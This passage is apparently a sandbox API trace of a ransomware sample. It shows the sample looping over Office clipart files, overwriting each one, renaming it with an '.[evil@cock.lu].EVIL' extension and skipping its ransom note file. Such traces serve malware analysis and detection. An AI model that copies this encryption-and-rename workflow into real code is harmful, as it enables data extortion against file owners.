??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.171] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.171] _errno () returned 0x84b1160840 [0141.171] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.171] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x11c0, lpOverlapped=0x0) returned 1 [0141.172] CloseHandle (hObject=0x1a8) returned 1 [0141.172] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.172] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.172] __uncaught_exception () returned 0x84b1160800 [0141.172] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.172] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf.[evil@cock.lu].evil")) returned 1 [0141.173] ??_V@YAXPEAX@Z () returned 0x1 [0141.176] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF", dwFileAttributes=0x200) returned 0 [0141.176] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.176] wcsstr (_Str="J0107192.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.176] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 69 [0141.176] wcscmp (_String1="J0107192.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.176] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107192.WMF") returned 0x0 [0141.176] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF") returned 0x45 [0141.176] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.178] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x26f0, lpOverlapped=0x0) returned 1 [0141.190] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.190] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.190] _errno () returned 0x84b1160840 [0141.190] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.190] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2700, lpOverlapped=0x0) returned 1 [0141.190] CloseHandle (hObject=0x1a8) returned 1 [0141.190] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.191] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.191] __uncaught_exception () returned 0x84b1160800 [0141.191] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.191] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf.[evil@cock.lu].evil")) returned 1 [0141.192] ??_V@YAXPEAX@Z () returned 0x1 [0141.195] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF", dwFileAttributes=0x200) returned 0 [0141.195] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.195] wcsstr (_Str="J0107254.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.195] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 69 [0141.195] wcscmp (_String1="J0107254.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.195] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107254.WMF") returned 0x0 [0141.195] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF") returned 0x45 [0141.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.198] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ef4, lpOverlapped=0x0) returned 1 [0141.201] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.201] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.201] _errno () returned 0x84b1160840 [0141.201] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.201] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4f00, lpOverlapped=0x0) returned 1 [0141.201] CloseHandle (hObject=0x1a8) returned 1 [0141.201] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.201] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.201] __uncaught_exception () returned 0x84b1160800 [0141.201] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.202] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf.[evil@cock.lu].evil")) returned 1 [0141.202] ??_V@YAXPEAX@Z () returned 0x1 [0141.205] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF", dwFileAttributes=0x200) returned 0 [0141.206] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.206] wcsstr (_Str="J0107258.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.206] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 69 [0141.206] wcscmp (_String1="J0107258.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.206] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107258.WMF") returned 0x0 [0141.206] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF") returned 0x45 [0141.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.208] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2168, lpOverlapped=0x0) returned 1 [0141.214] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.214] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.214] _errno () returned 0x84b1160840 [0141.214] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.214] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2180, lpOverlapped=0x0) returned 1 [0141.214] CloseHandle (hObject=0x1a8) returned 1 [0141.215] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.215] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.215] __uncaught_exception () returned 0x84b1160800 [0141.215] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.215] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf.[evil@cock.lu].evil")) returned 1 [0141.216] ??_V@YAXPEAX@Z () returned 0x1 [0141.219] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF", dwFileAttributes=0x200) returned 0 [0141.219] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.219] wcsstr (_Str="J0107262.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.219] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 69 [0141.219] wcscmp (_String1="J0107262.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.219] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107262.WMF") returned 0x0 [0141.219] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF") returned 0x45 [0141.219] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.221] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f3c, lpOverlapped=0x0) returned 1 [0141.224] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.224] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.224] _errno () returned 0x84b1160840 [0141.224] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.224] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0141.224] CloseHandle (hObject=0x1a8) returned 1 [0141.224] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.224] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.225] __uncaught_exception () returned 0x84b1160800 [0141.225] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.225] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf.[evil@cock.lu].evil")) returned 1 [0141.226] ??_V@YAXPEAX@Z () returned 0x1 [0141.229] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF", dwFileAttributes=0x200) returned 0 [0141.229] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.229] wcsstr (_Str="J0107264.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.229] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 69 [0141.229] wcscmp (_String1="J0107264.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.229] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107264.WMF") returned 0x0 [0141.229] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF") returned 0x45 [0141.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.231] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1498, lpOverlapped=0x0) returned 1 [0141.238] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.238] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.238] _errno () returned 0x84b1160840 [0141.238] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.238] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0141.238] CloseHandle (hObject=0x1a8) returned 1 [0141.239] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.239] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.239] __uncaught_exception () returned 0x84b1160800 [0141.239] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.239] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf.[evil@cock.lu].evil")) returned 1 [0141.240] ??_V@YAXPEAX@Z () returned 0x1 [0141.243] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF", dwFileAttributes=0x200) returned 0 [0141.243] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.243] wcsstr (_Str="J0107266.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.243] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 69 [0141.243] wcscmp (_String1="J0107266.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.243] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107266.WMF") returned 0x0 [0141.243] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF") returned 0x45 [0141.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.245] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16ec, lpOverlapped=0x0) returned 1 [0141.281] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.281] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.281] _errno () returned 0x84b1160840 [0141.281] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.281] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1700, lpOverlapped=0x0) returned 1 [0141.281] CloseHandle (hObject=0x1a8) returned 1 [0141.282] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.282] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.282] __uncaught_exception () returned 0x84b1160800 [0141.282] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.282] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf.[evil@cock.lu].evil")) returned 1 [0141.283] ??_V@YAXPEAX@Z () returned 0x1 [0141.286] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF", dwFileAttributes=0x200) returned 0 [0141.286] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.286] wcsstr (_Str="J0107280.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.286] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 69 [0141.286] wcscmp (_String1="J0107280.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.286] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107280.WMF") returned 0x0 [0141.286] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF") returned 0x45 [0141.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.288] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b64, lpOverlapped=0x0) returned 1 [0141.293] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.293] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.293] _errno () returned 0x84b1160840 [0141.293] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.293] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b80, lpOverlapped=0x0) returned 1 [0141.294] CloseHandle (hObject=0x1a8) returned 1 [0141.294] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.294] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.294] __uncaught_exception () returned 0x84b1160800 [0141.294] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.294] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf.[evil@cock.lu].evil")) returned 1 [0141.295] ??_V@YAXPEAX@Z () returned 0x1 [0141.298] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF", dwFileAttributes=0x200) returned 0 [0141.298] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.298] wcsstr (_Str="J0107282.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.298] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 69 [0141.298] wcscmp (_String1="J0107282.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.298] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107282.WMF") returned 0x0 [0141.298] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF") returned 0x45 [0141.298] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107282.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.300] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3734, lpOverlapped=0x0) returned 1 [0141.307] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.307] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.307] _errno () returned 0x84b1160840 [0141.307] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.307] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3740, lpOverlapped=0x0) 